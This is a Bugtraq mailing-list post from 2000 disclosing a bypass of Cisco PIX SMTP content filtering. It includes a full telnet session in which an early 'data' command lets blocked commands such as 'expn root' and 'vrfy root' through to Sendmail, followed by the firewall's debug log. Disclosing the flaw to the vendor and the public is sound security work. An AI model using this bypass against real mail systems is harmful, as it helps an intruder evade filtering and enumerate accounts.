Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Cisco PIX Firewall (smtp content filtering hack) [Finally resolved]

From: "Fabio Pietrosanti (naif)" <fabio () TELEMAIL IT>
Date: Tue, 3 Oct 2000 11:15:25 +0200
Hi,
This is the e-mail i sent to Cisco security-alert,
Today Cisco Released 5.2(4) that fix also this bug ...

The Cisco Patch to "SMTP Content Filtering tricks proposed by
naif () inet it " could be
avoid with the "SMTP Content Filtering tricks proposed by Lincoln Yeoh <
lyeoh () pop jaring my >" .


The Little hack posted on bugtraq by me on "Tue, 19 Sep 2000" work because
pix completelly disable the sanity check after "data" command .

Cisco Release the new PIX Versione that we installed on our test pix
5.2(2) .

The Cisco Advisor is:

http://www.cisco.com/warp/public/707/PIXfirewallSMTPfilter-pub.shtml

The i read on bugtraq about a tricks of Jul similar to my advisor :

http://www.securityfocus.com/templates/archive.pike?threads=0&list=1&end=2000-07-09&tid=68903&start=2000-07-03&;

So, 5.2(2) should avoid this problem and SMTP content filtering should
work...

Here the our Pix Test:
newpix# sh ver

Cisco Secure PIX Firewall Version 5.2(2)

Compiled on Sun 24-Sep-00 18:59 by morlee

newpix up 19 hours 27 mins

Hardware:   SE440BX2, 128 MB RAM, CPU Pentium II 349 MHz
Flash i28F640J5 @ 0x300, 16MB
BIOS Flash AT29C257 @ 0xfffd8000, 32KB

0: ethernet0: address is 00d0.b790.41a5, irq 11
1: ethernet1: address is 00d0.b790.54d4, irq 10
2: ethernet2: address is 00e0.b601.d289, irq 15
3: ethernet3: address is 00e0.b601.d288, irq 9
4: ethernet4: address is 00e0.b601.d287, irq 11
5: ethernet5: address is 00e0.b601.d286, irq 10

Licensed Features:
Failover:       Enabled
VPN-DES:        Enabled
VPN-3DES:       Enabled
Maximum Interfaces:     6
Cut-through Proxy:      Enabled
Guards:         Enabled
Websense:       Enabled
Throughput:     Unlimited
ISAKMP peers:   Unlimited

And the line regarding fixup in the config is:
fixup protocol smtp 25

===== Here the session...

<naif@naif> [~] $ telnet  ourtest 25
Trying 10.10.10.2...
Connected to eagletmp.
Escape character is '^]'.
data wow
expn root
vrfy root
help
helo pinco
220 **************************************************2******2000 ******00
*0200 ******
503 Need MAIL command
250 Pinco Pallino <pinco () ourtest ourdomain it>
250 <root () ourtest ourdomain it>
214-This is Sendmail version 8.9.1
214-Topics:
214-    HELO    EHLO    MAIL    RCPT    DATA
214-    RSET    NOOP    QUIT    HELP    VRFY
214-    EXPN    VERB    ETRN    DSN
214-For more info use "HELP <topic>".
214-To report bugs in the implementation send email to
214-    sendmail-bugs () sendmail org.
214-For local information send email to Postmaster at your site.
214 End of HELP info
250 ourtest.ourdomain.it Hello [10.10.10.10], pleased to meet you
quit
221 ourtest.ourdomain.it closing connection
Connection closed by foreign host.

#### As you can see we could bypass the "fixup smtp"

===== Here Cisco Pix Debug

        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
        tcp: SYN out rcvd
        tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        tcp: exiting embyonic
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
        tcp: TCP MSS changed to 1380
        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
        smtp: data command
        smtp: entering data mode
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        tcp: TCP MSS changed to 1380
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        tcp: TCP MSS changed to 1380
tcp: TCP MSS changed to 1380
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        smtp_respond: ERR: bad reply code
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
        smtp: quit command
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
        smtp_respond: ERR: bad reply code
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp: command (172.16.1.2/25 <- 10.10.10.10/3106)
smtp_response: (172.16.1.2/25 -> 10.10.10.10/3106)




=====
To Cisco :

Please check carefully also CBAC, because i think that it affect also IOS
CBAC inspect .
I'll release the Advisor for this new version on bugtraq the next week, so
you could release new Pix Version .







On Thu, 21 Sep 2000, Ioannis Migadakis wrote:


This particular vulnerability is not new.

It has been posted to BUGTRAQ on 9 Jul 2000 by Lincoln Yeoh with a title
"Out of order SMTP DATA commands incorrectly allow pass-through mode in
some firewall smtp filters/proxies"

The original post (does not say anything about Cisco PIX) can be found at:

http://www.securityfocus.com/templates/archive.pike?threads=0&list=1&end=200
0-07-09&tid=68903&start=2000-07-03&

Ioannis Migadakis






naif
Previous By Date Next
Previous By Thread Next

Current thread: